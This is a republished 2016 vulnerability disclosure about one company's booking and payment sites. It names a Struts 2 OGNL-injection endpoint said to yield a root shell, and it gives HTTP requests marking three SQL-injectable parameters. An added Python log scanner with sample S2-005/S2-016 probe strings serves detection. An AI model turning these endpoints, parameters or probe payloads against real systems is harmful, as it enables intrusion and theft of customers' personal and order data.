神刀安全网

Vulnerability title: 游惠宝 (uhuibao.com): vulnerabilities in four key sites bundled, GETSHELL / SQL injection (exposing 140K+ order transactions / 480K+ user records / intranet access obtained) (mainland China)

Vulnerability details

Disclosure status:

2016-04-19: Details reported to the vendor, awaiting the vendor's response
2016-04-24: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

Details:

1. Getshell

Backend of the 游惠宝 iOS app: the endpoint below is vulnerable to Struts 2 S2-005/S2-016 (OGNL expression injection), giving a shell directly.

Code:
http://if.uhuibao.com:9090/interface/askApp.action


Root privileges; intranet access obtained.

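The S2-005 and S2-016 probes that hit an endpoint like askApp.action have recognisable shapes in a web server's access log: S2-016 abuses the `redirect:` / `redirectAction:` / `action:` parameter-name prefixes to carry an OGNL expression (`${...}` or `%{...}`), and S2-005 smuggles `#` past the parameter blacklist as the OGNL unicode escape `\u0023` to flip `_memberAccess` / `allowStaticMethodAccess`. The detection logic below is an added example written for this page, not code from the report or from the vendor; the log lines are constructed (the path is the endpoint named above, the IPs and queries are invented), and the Combined Log Format layout is an assumption about what the server writes.

```python
"""Flag Struts 2 OGNL-injection probes (S2-005 / S2-016 shapes) in access-log lines."""
import re
from urllib.parse import unquote

# Constructed access-log lines for this example (not traffic from the report).
# The path is the endpoint named in the report; IPs and query strings are invented.
SAMPLE_LOG = """\
10.0.0.1 - - [19/Apr/2016:13:28:40 +0800] "POST /interface/askApp.action HTTP/1.1" 200 512
10.0.0.2 - - [19/Apr/2016:13:29:01 +0800] "GET /interface/askApp.action?redirect:${%23context['xwork.MethodAccessor.denyMethodExecution']%3Dfalse} HTTP/1.1" 302 0
10.0.0.3 - - [19/Apr/2016:13:29:15 +0800] "GET /interface/askApp.action?('%5Cu0023_memberAccess%5B'allowStaticMethodAccess'%5D')(x)=true HTTP/1.1" 200 64
10.0.0.4 - - [19/Apr/2016:13:30:00 +0800] "GET /interface/askApp.action?redirect=1&page=2 HTTP/1.1" 200 128
10.0.0.5 - - [19/Apr/2016:13:30:20 +0800] "GET /interface/askApp.action?redirectAction%3A%25%7B%23a%3D1%7D HTTP/1.1" 302 0
"""

# Combined/Common Log Format request line (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# S2-016: a parameter *name* starting with one of the action-mapper prefixes plus an OGNL expression.
S2_016_PREFIX = re.compile(r'(?:^|[?&])(?:redirect|redirectAction|action):', re.IGNORECASE)
OGNL_EXPR = re.compile(r'[$%]\{')
# S2-005: '#' written as the OGNL unicode escape \u0023 to bypass the ParametersInterceptor
# blacklist, typically to flip _memberAccess / allowStaticMethodAccess.
S2_005_MARKERS = ('\\u0023', '_memberaccess', 'allowstaticmethodaccess')


def normalize(target: str) -> str:
    """URL-decode up to twice; probes are frequently double-encoded."""
    decoded = target
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(target: str) -> list:
    """Return the list of Struts advisories whose probe shape the request target matches."""
    s = normalize(target)
    tags = []
    if S2_016_PREFIX.search(s) and OGNL_EXPR.search(s):
        tags.append('S2-016')
    low = s.lower()
    if any(marker in low for marker in S2_005_MARKERS):
        tags.append('S2-005')
    return tags


def scan(log_text: str) -> list:
    """Return (ip, target, tags) for every parsable request line that carries a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m['target'])
        if tags:
            hits.append((m['ip'], m['target'], tags))
    return hits


if __name__ == '__main__':
    for ip, target, tags in scan(SAMPLE_LOG):
        print(ip, tags, target[:80])
```

Only GET probes are visible this way; a POST body carrying the same payload never reaches the access log, so on a Struts 2 host the request-body inspection has to happen in a WAF or in a patched `ParametersInterceptor`, and the log rule is a net for the lazy scanner rather than a substitute for upgrading.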

2. SQL injection

1) Site: http://pay.uhuibao.com:8083/

The following location is SQL-injectable (the loginname parameter in the POST body, boolean-based blind):

Code:
POST http://pay.uhuibao.com:8083/SunspeedyPayment/VloginUser.action HTTP/1.1
Host: pay.uhuibao.com:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://pay.uhuibao.com:8083/SunspeedyPayment/
Content-Length: 48
Cookie: JSESSIONID=675A3C973B8FB6B9E37629E175B61945
Connection: keep-alive

loginname=admin&loginpwd=admin&exchangLang=zh_CN

2) Site: http://e.uhuibao.com:8080/

The following location is SQL-injectable (the channel parameter in the POST body, boolean-based blind):

Code:
POST http://e.uhuibao.com:8080/ticket/eticket.action HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://e.uhuibao.com:8080/ticket/eticket.action
Cookie: vst=IE001tOillki/hE881nQVHSYL6xUh1PwpiEyekl6MJPr+Mg3i9snZutEIwZa+t7cC5Ia9EWxXTmDFJO70VcbrOm4BXC4QM00JEJjCneQAF4DC4G4=; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A; JSESSIONID=3C1396A90044540EC6C51FFF2ABE659A
Host: e.uhuibao.com:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

channel=TICKET_UHBAPP&format=json&message=message%3D%7B%22request_message%22%3A%7B%22req_type%22%3A%2205%22%2C%22message%22%3A%7B%22type%22%3A%221%22%7D%7D%7D&method=eticketrequest&sign=A3485240A2F74A515198E03E15723CE0&timestamp=2016-04-19+13%3A28%3A40&version=1.0

3) Site: http://ws.uhuibao.com:88/

The LoginName element in the SOAP POST body, error-based injection:

Code:
POST http://ws.uhuibao.com:88/OrclApp.asmx HTTP/1.1
SOAPAction: http://ws.uhuibao.com/MobileUserLoginDevice
Content-Type: text/xml
Content-Length: 359
Referer: http://ws.uhuibao.com:88/OrclApp.asmx
Host: ws.uhuibao.com:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<soap:Envelope xmlns:xsi="1&apos;&quot;" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><MobileUserLoginDevice xmlns="http://ws.uhuibao.com/"><LoginName><![CDATA[admin]]></LoginName><Password><![CDATA[2365675]]></Password><Deviceid></Deviceid></MobileUserLoginDevice></soap:Body></soap:Envelope>

Proof of vulnerability:

1. Current database user: root


2. All databases: 37 in total


3. User table and order table: 140K+ order transactions / 480K+ user records


Remediation:

Please advise~

Upgrade Struts 2 to a release that closes S2-016 (2.3.15.1 or later; S2-005 was closed in 2.2.1), and build every database query with bound parameters instead of string concatenation.

Copyright notice: credit the source when reposting: 路人甲 (Anonymous) @ 烏雲 (WooYun)
